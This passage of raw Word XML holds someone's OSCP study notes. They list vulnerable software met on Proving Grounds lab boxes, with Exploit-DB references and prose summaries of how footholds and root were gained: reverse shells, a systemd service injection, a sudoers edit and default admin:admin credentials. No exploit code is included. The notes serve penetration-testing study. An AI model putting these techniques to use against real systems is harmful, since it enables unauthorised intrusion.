        </w:rPr>
        <w:t xml:space="preserve">If you see Linux 4.4.0–31-generic, then look at </w:t>
      </w:r>
      <w:hyperlink r:id="rId1304">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Loly</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play which got root using this </w:t>
      </w:r>
      <w:hyperlink r:id="rId1305">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">exploit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (exploit DB ID 45010)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039F7">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you ever run into a box using Adminer, an open-source database management website, then you can look at the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1306">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Tre</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play Walkthrough since it enumerates through that</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039F9">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I was reading an </w:t>
      </w:r>
      <w:hyperlink r:id="rId1307">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">article</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> about OSCP studying and they randomly used CodeIgniter CMS version 4.2.0 as an example, which had a SQLi injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039FB">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RecordedTV.library-ms (as seen in the SMB of Relia Challenge Lab) seems standard and useless</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039FD">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039FE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RiteCMS Version 3 was exploited in the Relia Challenge Lab for 192.168.xxx.249 to get foothold into machine but only after we got into admin page by guessing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin:admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> credentials. Easy Rite CMS exploit</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000039FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="159"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1308">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/50616</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A00">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="571"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CS-Cart 1.3.3 (CS Cart) was exploited in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1309">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">PayDay</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice which get them rev shell foothold. Apparently, the exploitDB didn't explain it will but </w:t>
      </w:r>
      <w:hyperlink r:id="rId1310">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">this</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> github did</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="571"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1311">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">This</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> writeup found an LFI exploit from CS-cart too, but rev shell is better</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A03">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A04">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1032"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Simple PHP Photo Gallery v0.8 was exploited in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1312">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Snookums</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A05">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1032"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It has both an RFI exploit (where you can upload reverse shell) and an automated exploit (that gives you shell), both of which are mentioned in the writeup. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A06">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hetemit PG Practice was a really hard box</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and it was about API and python and like SHA512 encryption for foothold. And then for priv esc, they had /sbin/reboot and a /etc/systemd/system/pythonapp.service file that they injected a bash reverse shell into</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A08">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A09">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Zenphoto 1.4.1.4 (CMS) was exploited in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1313">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Zenphoto</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice. The crazy part is that you don't need to be authenticated, and you get a reverse shell!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A0A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="181"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RDS (CVE-2010–3904) is a Linux Kernel exploit for Linux Kernel 2.6.36-rc8. This was exploited in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1314">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Zenphoto</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A0C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="181"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LinPEAS also caught it but it was way down in the list of exploits, so probably best to manually enumerate kernel version and google it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A0D">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="181"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">eXtPlorer was a website seen in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1315">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">extplorer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A0F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="181"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:hyperlink r:id="rId1316">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">this</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> writeup, they showed how to find the root directory of the website (so we know where to upload rev shells) and then they taught us how to upload reverse and web shells. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A10">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="181"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:hyperlink r:id="rId1317">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">this</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> writeup, they also showed the above, but also taught us how to enumerate files on the machine using extplorer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A11">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A12">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The website </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RestAP </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">was exploited in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1318">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Walla</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice after we logged in as admin. We looked at the system page which showed a console page that allowed direct command execution on the server. And then from there, we just checked for python, and then set a python rev shell back to ourselves</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A13">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="666"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rpc.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (found in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /opt/rpc.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) was exploited in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1319">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">PC</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG practice. They saw it a process (running as root) was running /opt/rpc.py which is suspicious since anything in /opt/ is third party. So they found this exploit and used it to add their user to /etc/sudoers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="666"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1320">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/50983</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A16">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
